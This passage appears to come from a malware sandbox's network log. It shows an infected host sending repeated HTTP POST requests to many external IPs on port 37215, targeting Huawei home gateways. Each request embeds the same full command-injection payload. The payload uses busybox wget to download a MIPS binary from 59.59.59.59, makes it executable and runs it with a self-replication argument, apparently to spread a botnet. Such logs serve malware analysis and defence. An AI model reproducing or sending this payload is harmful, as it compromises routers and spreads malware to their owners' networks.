                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2025192.168.2.1547678205.159.73.19537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.058120012 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2026192.168.2.1534998197.90.22.14237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.058157921 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2027192.168.2.1535498157.68.243.19937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.058195114 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2028192.168.2.1536894157.68.142.16437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.058502913 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2029192.168.2.1557834189.215.28.10537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.058728933 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2030192.168.2.1556012157.105.90.3737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.058857918 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2031192.168.2.1540278197.96.140.4937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.058890104 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2032192.168.2.1550814191.207.203.8337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.058928967 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2033192.168.2.1547244157.51.158.23237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.059101105 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2034192.168.2.1560612197.231.41.9237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.059145927 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
